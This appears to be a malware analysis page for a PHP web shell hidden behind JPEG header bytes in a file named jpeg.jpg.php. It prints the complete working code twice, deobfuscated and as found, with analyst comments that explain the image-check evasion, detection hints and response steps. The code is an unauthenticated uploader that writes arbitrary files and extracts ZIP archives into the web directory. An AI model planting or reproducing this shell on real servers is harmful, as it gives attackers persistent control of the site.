PHP Malware Analysis


Filename: jpeg.jpg.php

Tags

Input
  • _POST
  • _FILES
Files
  • copy

Deobfuscated code

JFIFICC_PROFILElcms0mntrRGB XYZ acspAPPL-lcmsdesc8cprt@Nwtptchad,rXYZbXYZgXYZrTRC gTRC, bTRCL chrml$mlucenUSsRGB built-inmlucenUS2No copyright, use freelyXYZ -sf32J*XYZ o8XYZ $XYZ bparaff
Y
[paraff
Y
[paraff
Y
[chrmT{L&f\C	!"$"$C"5B38_4`sIJ2"F)j|9<܄`"ӳ`FƟ[RE7J=lXD`} 9?H("9dwg:>xX4ZŔ!Mey"X$G/ qXQ7LHhdʋ"1
f/e92GyCˁ99J)h4kTRT
ڪ#"VK%FL=
B1zevI~$J_:#@+*DhhB@kO1h>	ϚWl&}JQsPu]Tc&Y,UjEōiEeXPL!ΏG~Y#8
U_Ôr̞Q-5C)~uckh#)0CgrTݑ5nUR<PԢAV}Ŀ"XQ4CfVH4]+%64AjwxAw瞌׬%Y|W+nJ	ƕ&,|h'̳=ӫ
uVa-aH#+!"1# 23A$45:<Ke^n.h)!mjѫ8qC׺9ܽCbK"2?nQ-^uTJ*PkmEwPOp
x@54JM8{7}%~c(*%TdMRE#PEoqJۨSf]CiӤ1^u"~^@=>>mWYI#<
hP?.)hvhhbGsK^,yO/ (@<?W+R@oW;IJӹc44Ih$[Zʻ^Փn/oOӚNZ޷&?4c?j{oC)vE	]]?I@2",\F\}bhԇh2dWP4&㨛e[RK~)ڏ4\%Iv.&9$j/4Mk jORd

})#
Ƥeme=RܽBs\:CO~>ӝ!XŹ^j&\_[5#RT҂̒Eػϯqy9`UӌԘo`!ajpr-hknDvխXR(p'S4,6P>⸣]03XHVf{yL]׈x~d@jm5^A$=Ѭ0bH|u	q,qj$kk|}&XC4-ɂ#Y4
ڥoJ1%Ζhz5c;#-`07wkEkLh_h5h-{<՚6u4vDVy"N>xy:jM*Db";imYUiC2'95|ժ&NBGDvj#Ak1rkw[1q/
S+;%|@lfj,n7w2QjUlTϨƁ#8<?2WW[Ên*#e[Ȼrc`ծ5į䫉7kC쑹M_ӷ84EO"?yTT:t$U8mQm! Ǵ-ϒRcp#e˂bU(Vks~J-I޳ot|0vOđ!̒9k8\flɹ$"7_
'톏ݸF5?f߃(fGK$qI6i#7tB/8*(MZoQTq*iώZn9~(yEF]o|v%դnV}E_p?p?5!1AQ "aq2BR#br$03?FNS;6^ʫNw&rmZysB-p.݃!q{:]JfĵW1lF 8"18xOlBs'
7s}ܬ-~a^X!!io}VU3[6P5S W/u?gHv*UHW
w}(bު|一x1Ih[V—WW.hʆ1I!-Z%SMdfUIR-0(A{BjE.YBǒmVF7{+Vʘ_y,e?MW4XR_ꨵ>G2p`-j]$i.{/'`C)+w#=;0NR4"?TL*tƀ/s:_eZD."d[JgY胃dGD):M~-lխSϲmODػ;苍UJBuC>`VʑGwp/!*i{\;zOcG<y蠸KAq<Mm!BQj|苎?0VX4{(jZw8RW%v/F&$S' Gzg-.eM-OE2MF9w0=8L'
.慝ĄcG	k)U)bٴ?%pEz͏npTi$2D|\}T_dBTڤڎm.#9)U𹠄괤@WpPP<+og(0]Qm<7}ЙP<֥%!1AQaq ?!tJd1$&l0(i4c3G+bW.e2Zb7BqO#_+=MH~93#Oׁ̮q_d*sgPRsb4,X+Q[a@xʽC]a/n:_,ʩ~bwm\ߙK8O:L s>v@D6O&׏DL%D&"9=*--	ulYs5/sÛh{q?Qh:\'=@eqa,AlSVϏ
	J[WԬj.C"-eaGej}BC\%<
D@[L*[Zw.WfE0Uze7xar솚2uA
+(0Y.][0.i.RTOcm12$++hCb)=wJ&%~%[hmL̦%sz(r1%`KWgWTRG~\ˉnF")=Jܵ$)c
yF}.+2BȮE QHfy
GtQGD9<̛]"`D_mMc26ZSeƍ,[pH	X~N
Qqv2TJ*nȆs8H4P}@3(4*SZ$d P@PԼf|2MgԸvf53Jbq_
W@x'nS09JIWSU.U[f"{Om~XܐNˇ|!tmTLQHjm:E
k5%Vda`3EF-I;+`%>s64
frSsPO*~K-Qs~mDERD16

PfqHMyzaX#8
Džg2\t栭Q5ܶ?N(G
&r%hl2SL7\Uw7K~:_SEgc,ɟ.iQ%I%rE)!(=ĸD3	nSYaΒV_Z(|FP!ܤqZ֑'c:=Nb[əP |(j"EARqą76DmPg
K4/^#LziC'ss8{ME
EyЂ$]6S
<OJK[GEMd7R2̠VU|NN`e
j.tf<ǧRP%L3)[?6.CxóڌK'7js)?W+Ȉ*
"\RڇuYT~/(bAR>0!4L@o$r
fḆʱjz<:&\%avL{c9~I	JOzj+B-5eCb\Wz*ָ\3d-V[bU2\{S%dg 7,:7r;8Q+YfIy޷h4? s400F,(b
024pH,pp `,G$s3E(2(H(c43A"088ӎÄ,0q$p?p?&!1AQaq?"A9\BׯkYQH!2z"-49KDSxaA0*Y!)\A)0S87gn҃@'W+DFT'
UivFIM t%0ǒRWUQMw!(pMH@[Ne[qM\P#C D'zqB]6nI@e)5h!o30vU]`X$/˯`%J-^oȡo3!+@ٳ(E"T4jf8xe\E:;+%ZVR(B2O@4](du8`@-IֹLqej:8QG<-ؗ@XJmJ|aBb
f?MtpgB,ug=6J})@t\ĶpIAѼT5ڇ0.WeVcv\Q~~=ZVUb.sXFg6.eM4|7ZȠ22ˌ#PSHVL3K+0;=Cn5\"97Yn%)'DJqL;_P6GJ\kOOġV+[NQ(JJ9W	¸Qw\mx	Fe汯iI'?12&Ot~bg%L+IQXtJo\u@-~`:=
'{E
4r3Q@\ctˬP%PKB^.hg	,Wі*8F#{;Uw
x)JhɆZCȟAUb'iqr%3t_t%6`4(Pn8I0tfpcEhғ>
ȉPn+@XgAؖƞ,F1Q.	n>*{,%4.}	,V\T*iwvKҎ%Xy۷1lR
=BVPine/x%4Bɀے+z,x.GNBGCp +Υ…ʜ/Ec=.g3t1ZYQUm*F59=Z/\CvJKs%ۅgǶGCx(`!q20a$͓9:ES*6UʞU{k*H5
cׁ;dli2/Un"ڤ֪;ElE2xp:30XL0%EA/
-UuЇ
.-j< U|B|OYW4V]U=D݌AXc+n#m[?hVYoEwJ
ԆzEoz8-(̭P	h6ǔFDXkYkKԠ݊
{]J採	yYQŢdrbeujYHp?~JWii#Bip5&r"S@F[eH*fŃEН*X{v6tvDI^Hu|p
ǿkLV[ߴAh^b[n
0ߛ%9RR!m
qJӁd$-NT.i`.d`Tm FEb揈=E1na0~e+1XaQb@(4=bsMzq
WX5O3	;=Duz
la2<[:X.N--XutX)5ZjJ|tyigJ!}S]^қGY*es1v"%hߘYiru
he`aQSC01j	YuʮC^L2JJ@MLy576ů\@AЉ})[MƯxsPr`PDV(yEp|	r@Y2=)Y %x\PGc7uL,&4-BaKgNu
$0̍DIn0R.Rn̩Jf`XX!
i"WD4@uLe`HdO=fLJ
q)##-4r^vKXl.MzLpo3/EF(
hӸ4\x^0[r'^]vOcG%l`cl4!_L8iQ‹-+5,@VVeD;h`Kb]+ȍ	*Zx57c1=la&NA)	WLjtTI[ıxmiT8;bf1ѣhVu9
jc
)VCaXZb-.௼F>EcS*Ȁc]6+s08aV`Z1\	IVWWĶCp3Fj@'Texy
vr-q
 6&@
BMy+窽h9eʹ<b!AI}P#G7}%T(y\s+C¦*<<?php 
// ANALYST NOTE: unauthenticated file-upload web shell, shown here for analysis.
// The PHP payload follows JPEG/JFIF/ICC header bytes in a file named jpeg.jpg.php:
// the image header lets the file pass a naive "is it an image?" check, while the
// trailing .php extension gets it executed by the server.
// Nothing in this code checks a password, session or source address, so anyone
// who can request the file can use it.
// Detection hints: the banner string below (note the malformed "<h1/>" closer),
// a "<?php" tag inside image data, and double extensions such as ".jpg.php".

// Render the banner and a multipart upload form that posts back to this same URL.
echo "<h1>GOTTEN SIKICI UPLOADER<h1/>";
echo "<form action=\"\" method=\"post\" enctype=\"multipart/form-data\" name=\"uploader\" id=\"uploader\">";
echo "<input type=\"file\" name=\"file\" size=\"50\"><input name=\"_upl\" type=\"submit\" id=\"_upl\" value=\"Upload\"></form>";
// The upload branch runs when the submit button value is posted. The key is read
// without isset(), and the comparison is loose (==).
if ($_POST['_upl'] == "Upload") {
    // Destination name is the client-supplied filename; no extension, MIME type
    // or content check is applied anywhere in this code.
    $file = $_FILES['file']['name'];
    // copy() writes the upload to a relative path, i.e. the process's current
    // working directory (normally the script's own directory under a web server).
    // The @ operator hides the warning copy() would emit on failure.
    if (@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) {
        // Try to treat the uploaded file as a ZIP archive.
        $zip = new ZipArchive();
        if ($zip->open($file) === TRUE) {
            // Every archive entry is unpacked into the current directory, so one
            // request can drop many files. The archive itself is not deleted.
            $zip->extractTo('./');
            $zip->close();
            // Turkish: "Zip extraction successful!"
            echo "Zip Cikarma Basarili!";
        } else {
            // Not a ZIP: the file stays on disk exactly as uploaded.
            // Turkish: "File upload successful!"
            echo "Dosya Yukleme Basarili!";
        }
    } else {
        // Turkish: "Upload failed :("
        echo "<b>Yukleme Basarisiz :(</b><br><br>";
    }
}


Original code

JFIFICC_PROFILElcms0mntrRGB XYZ acspAPPL-lcmsdesc8cprt@Nwtptchad,rXYZbXYZgXYZrTRC gTRC, bTRCL chrml$mlucenUSsRGB built-inmlucenUS2No copyright, use freelyXYZ -sf32J*XYZ o8XYZ $XYZ bparaff
Y
[paraff
Y
[paraff
Y
[chrmT{L&f\C	!"$"$C"5B38_4`sIJ2"F)j|9<܄`"ӳ`FƟ[RE7J=lXD`} 9?H("9dwg:>xX4ZŔ!Mey"X$G/ qXQ7LHhdʋ"1
f/e92GyCˁ99J)h4kTRT
ڪ#"VK%FL=
B1zevI~$J_:#@+*DhhB@kO1h>	ϚWl&}JQsPu]Tc&Y,UjEōiEeXPL!ΏG~Y#8
U_Ôr̞Q-5C)~uckh#)0CgrTݑ5nUR<PԢAV}Ŀ"XQ4CfVH4]+%64AjwxAw瞌׬%Y|W+nJ	ƕ&,|h'̳=ӫ
uVa-aH#+!"1# 23A$45:<Ke^n.h)!mjѫ8qC׺9ܽCbK"2?nQ-^uTJ*PkmEwPOp
x@54JM8{7}%~c(*%TdMRE#PEoqJۨSf]CiӤ1^u"~^@=>>mWYI#<
hP?.)hvhhbGsK^,yO/ (@<?W+R@oW;IJӹc44Ih$[Zʻ^Փn/oOӚNZ޷&?4c?j{oC)vE	]]?I@2",\F\}bhԇh2dWP4&㨛e[RK~)ڏ4\%Iv.&9$j/4Mk jORd

})#
Ƥeme=RܽBs\:CO~>ӝ!XŹ^j&\_[5#RT҂̒Eػϯqy9`UӌԘo`!ajpr-hknDvխXR(p'S4,6P>⸣]03XHVf{yL]׈x~d@jm5^A$=Ѭ0bH|u	q,qj$kk|}&XC4-ɂ#Y4
ڥoJ1%Ζhz5c;#-`07wkEkLh_h5h-{<՚6u4vDVy"N>xy:jM*Db";imYUiC2'95|ժ&NBGDvj#Ak1rkw[1q/
S+;%|@lfj,n7w2QjUlTϨƁ#8<?2WW[Ên*#e[Ȼrc`ծ5į䫉7kC쑹M_ӷ84EO"?yTT:t$U8mQm! Ǵ-ϒRcp#e˂bU(Vks~J-I޳ot|0vOđ!̒9k8\flɹ$"7_
'톏ݸF5?f߃(fGK$qI6i#7tB/8*(MZoQTq*iώZn9~(yEF]o|v%դnV}E_p?p?5!1AQ "aq2BR#br$03?FNS;6^ʫNw&rmZysB-p.݃!q{:]JfĵW1lF 8"18xOlBs'
7s}ܬ-~a^X!!io}VU3[6P5S W/u?gHv*UHW
w}(bު|一x1Ih[V—WW.hʆ1I!-Z%SMdfUIR-0(A{BjE.YBǒmVF7{+Vʘ_y,e?MW4XR_ꨵ>G2p`-j]$i.{/'`C)+w#=;0NR4"?TL*tƀ/s:_eZD."d[JgY胃dGD):M~-lխSϲmODػ;苍UJBuC>`VʑGwp/!*i{\;zOcG<y蠸KAq<Mm!BQj|苎?0VX4{(jZw8RW%v/F&$S' Gzg-.eM-OE2MF9w0=8L'
.慝ĄcG	k)U)bٴ?%pEz͏npTi$2D|\}T_dBTڤڎm.#9)U𹠄괤@WpPP<+og(0]Qm<7}ЙP<֥%!1AQaq ?!tJd1$&l0(i4c3G+bW.e2Zb7BqO#_+=MH~93#Oׁ̮q_d*sgPRsb4,X+Q[a@xʽC]a/n:_,ʩ~bwm\ߙK8O:L s>v@D6O&׏DL%D&"9=*--	ulYs5/sÛh{q?Qh:\'=@eqa,AlSVϏ
	J[WԬj.C"-eaGej}BC\%<
D@[L*[Zw.WfE0Uze7xar솚2uA
+(0Y.][0.i.RTOcm12$++hCb)=wJ&%~%[hmL̦%sz(r1%`KWgWTRG~\ˉnF")=Jܵ$)c
yF}.+2BȮE QHfy
GtQGD9<̛]"`D_mMc26ZSeƍ,[pH	X~N
Qqv2TJ*nȆs8H4P}@3(4*SZ$d P@PԼf|2MgԸvf53Jbq_
W@x'nS09JIWSU.U[f"{Om~XܐNˇ|!tmTLQHjm:E
k5%Vda`3EF-I;+`%>s64
frSsPO*~K-Qs~mDERD16

PfqHMyzaX#8
Džg2\t栭Q5ܶ?N(G
&r%hl2SL7\Uw7K~:_SEgc,ɟ.iQ%I%rE)!(=ĸD3	nSYaΒV_Z(|FP!ܤqZ֑'c:=Nb[əP |(j"EARqą76DmPg
K4/^#LziC'ss8{ME
EyЂ$]6S
<OJK[GEMd7R2̠VU|NN`e
j.tf<ǧRP%L3)[?6.CxóڌK'7js)?W+Ȉ*
"\RڇuYT~/(bAR>0!4L@o$r
fḆʱjz<:&\%avL{c9~I	JOzj+B-5eCb\Wz*ָ\3d-V[bU2\{S%dg 7,:7r;8Q+YfIy޷h4? s400F,(b
024pH,pp `,G$s3E(2(H(c43A"088ӎÄ,0q$p?p?&!1AQaq?"A9\BׯkYQH!2z"-49KDSxaA0*Y!)\A)0S87gn҃@'W+DFT'
UivFIM t%0ǒRWUQMw!(pMH@[Ne[qM\P#C D'zqB]6nI@e)5h!o30vU]`X$/˯`%J-^oȡo3!+@ٳ(E"T4jf8xe\E:;+%ZVR(B2O@4](du8`@-IֹLqej:8QG<-ؗ@XJmJ|aBb
f?MtpgB,ug=6J})@t\ĶpIAѼT5ڇ0.WeVcv\Q~~=ZVUb.sXFg6.eM4|7ZȠ22ˌ#PSHVL3K+0;=Cn5\"97Yn%)'DJqL;_P6GJ\kOOġV+[NQ(JJ9W	¸Qw\mx	Fe汯iI'?12&Ot~bg%L+IQXtJo\u@-~`:=
'{E
4r3Q@\ctˬP%PKB^.hg	,Wі*8F#{;Uw
x)JhɆZCȟAUb'iqr%3t_t%6`4(Pn8I0tfpcEhғ>
ȉPn+@XgAؖƞ,F1Q.	n>*{,%4.}	,V\T*iwvKҎ%Xy۷1lR
=BVPine/x%4Bɀے+z,x.GNBGCp +Υ…ʜ/Ec=.g3t1ZYQUm*F59=Z/\CvJKs%ۅgǶGCx(`!q20a$͓9:ES*6UʞU{k*H5
cׁ;dli2/Un"ڤ֪;ElE2xp:30XL0%EA/
-UuЇ
.-j< U|B|OYW4V]U=D݌AXc+n#m[?hVYoEwJ
ԆzEoz8-(̭P	h6ǔFDXkYkKԠ݊
{]J採	yYQŢdrbeujYHp?~JWii#Bip5&r"S@F[eH*fŃEН*X{v6tvDI^Hu|p
ǿkLV[ߴAh^b[n
0ߛ%9RR!m
qJӁd$-NT.i`.d`Tm FEb揈=E1na0~e+1XaQb@(4=bsMzq
WX5O3	;=Duz
la2<[:X.N--XutX)5ZjJ|tyigJ!}S]^қGY*es1v"%hߘYiru
he`aQSC01j	YuʮC^L2JJ@MLy576ů\@AЉ})[MƯxsPr`PDV(yEp|	r@Y2=)Y %x\PGc7uL,&4-BaKgNu
$0̍DIn0R.Rn̩Jf`XX!
i"WD4@uLe`HdO=fLJ
q)##-4r^vKXl.MzLpo3/EF(
hӸ4\x^0[r'^]vOcG%l`cl4!_L8iQ‹-+5,@VVeD;h`Kb]+ȍ	*Zx57c1=la&NA)	WLjtTI[ıxmiT8;bf1ѣhVu9
jc
)VCaXZb-.௼F>EcS*Ȁc]6+s08aV`Z1\	IVWWĶCp3Fj@'Texy
vr-q
 6&@
BMy+窽h9eʹ<b!AI}P#G7}%T(y\s+C¦*<<?php
  // ANALYST NOTE: original (as-found) form of the upload web shell appended to JPEG data.
  // No authentication or input validation is present in this code.
  // Response hints: treat every file in this directory newer than the shell as suspect,
  // review web logs for multipart POSTs to this file, and deny PHP execution
  // in directories that accept uploads.

  // Banner and self-posting multipart upload form (empty action = same URL).
  echo '<h1>GOTTEN SIKICI UPLOADER<h1/>';
  echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
  echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
  // Runs only when the form's submit value is posted; loose comparison, no isset() guard.
  if( $_POST['_upl'] == "Upload" ) {
  // Client-supplied filename is used as the destination path without any filtering.
  $file = $_FILES['file']['name'];
  // Copies the temp upload to a relative path (current working directory); @ hides warnings on failure.
  if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) {
  // Attempt to open the stored upload as a ZIP archive.
  $zip = new ZipArchive;
  if ($zip->open($file) === TRUE) {
     // Unpacks all entries into the current directory; the archive is left on disk afterwards.
     $zip->extractTo('./');
     $zip->close();
  // Turkish: "Zip extraction successful!"
  echo 'Zip Cikarma Basarili!';
  } else {
  // Not a ZIP archive: the uploaded file remains in place as-is. Turkish: "File upload successful!"
  echo 'Dosya Yukleme Basarili!';
  }
  }else{
  // copy() failed. Turkish: "Upload failed :("
  echo '<b>Yukleme Basarisiz :(</b><br><br>';
  }
  }

?>